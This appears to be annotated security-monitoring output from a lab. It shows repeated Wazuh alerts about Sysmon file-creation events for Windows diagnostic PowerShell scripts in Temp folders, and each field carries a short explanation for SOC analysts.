Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059', 'T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution', 'Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Command and Scripting Interpreter', 'Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533981.545637
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means the Event ID and the eventdata fields follow Sysmon's schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:47:59.1641125Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  215905
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-17 16:47:59.162 ProcessGuid: {94294ddc-4855-6800-0605-000000000e00} ProcessId: 8224 Image: C:\WINDOWS\system32\taskhostw.exe TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\RS_UserDiagnosticHistory.ps1 CreationUtcTime: 2025-04-17 16:47:59.162 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-17 16:47:59.162
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-4855-6800-0605-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\taskhostw.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\RS_UserDiagnosticHistory.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-17 16:47:59.162
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Scripting file created under Windows Temp or User folder

🧠 What happened? Scripting file created under Windows Temp or User folder

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:33:01.206+0000 | 🧠 MITRE: ['Execution', 'Command and Control'] – ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] [T1059] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:01.206+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Scripting file created under Windows Temp or User folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92200
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059', 'T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution', 'Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Command and Scripting Interpreter', 'Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533981.548328
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:47:59.1720606Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  215906
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-17 16:47:59.164 ProcessGuid: {94294ddc-4855-6800-0605-000000000e00} ProcessId: 8224 Image: C:\WINDOWS\system32\taskhostw.exe TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\RS_UserWERQueue.ps1 CreationUtcTime: 2025-04-17 16:47:59.164 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-17 16:47:59.164
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-4855-6800-0605-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\taskhostw.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\RS_UserWERQueue.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-17 16:47:59.164
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Scripting file created under Windows Temp or User folder

🧠 What happened? Scripting file created under Windows Temp or User folder

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:33:01.243+0000 | 🧠 MITRE: ['Execution', 'Command and Control'] – ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] [T1059] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:01.243+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Scripting file created under Windows Temp or User folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92200
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059', 'T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution', 'Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Command and Scripting Interpreter', 'Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533981.550983
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:47:59.1781228Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  215907
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-17 16:47:59.173 ProcessGuid: {94294ddc-4855-6800-0605-000000000e00} ProcessId: 8224 Image: C:\WINDOWS\system32\taskhostw.exe TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\TS_DiagnosticHistory.ps1 CreationUtcTime: 2025-04-17 16:47:59.170 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-17 16:47:59.173
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-4855-6800-0605-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\taskhostw.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\TS_DiagnosticHistory.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-17 16:47:59.170
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Scripting file created under Windows Temp or User folder

🧠 What happened? Scripting file created under Windows Temp or User folder

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:33:01.249+0000 | 🧠 MITRE: ['Execution', 'Command and Control'] – ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] [T1059] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:01.249+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Scripting file created under Windows Temp or User folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92200
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059', 'T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution', 'Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Command and Scripting Interpreter', 'Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533981.553658
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:47:59.1906537Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  215909
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-17 16:47:59.181 ProcessGuid: {94294ddc-4855-6800-0605-000000000e00} ProcessId: 8224 Image: C:\WINDOWS\system32\taskhostw.exe TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\TS_InaccurateSystemTime.ps1 CreationUtcTime: 2025-04-17 16:47:59.181 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-17 16:47:59.181
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-4855-6800-0605-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\taskhostw.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\TS_InaccurateSystemTime.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-17 16:47:59.181
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Scripting file created under Windows Temp or User folder

🧠 What happened? Scripting file created under Windows Temp or User folder

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:33:01.267+0000 | 🧠 MITRE: ['Execution', 'Command and Control'] – ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] [T1059] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:01.267+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Scripting file created under Windows Temp or User folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92200
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059', 'T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution', 'Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Command and Scripting Interpreter', 'Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  9
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533981.556345
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:47:59.2078912Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  215910
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-17 16:47:59.190 ProcessGuid: {94294ddc-4855-6800-0605-000000000e00} ProcessId: 8224 Image: C:\WINDOWS\system32\taskhostw.exe TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\TS_WERQueue.ps1 CreationUtcTime: 2025-04-17 16:47:59.190 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-17 16:47:59.190
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-4855-6800-0605-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\taskhostw.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\TS_WERQueue.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-17 16:47:59.190
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:33:01.860+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:01.860+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533981.558984
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:48:00.6014475Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  215966
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-17 16:48:00.599 ProcessGuid: {94294ddc-30bf-6801-4608-000000000e00} ProcessId: 6980 Image: C:\WINDOWS\System32\sdiagnhost.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_db30s5jz.dk2.ps1 CreationUtcTime: 2025-04-17 16:48:00.599 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-17 16:48:00.599
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-30bf-6801-4608-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  6980
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\sdiagnhost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_db30s5jz.dk2.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

